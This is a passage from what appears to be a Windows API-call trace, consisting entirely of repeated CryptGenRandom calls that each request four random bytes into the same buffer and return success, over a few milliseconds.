returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.469] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: 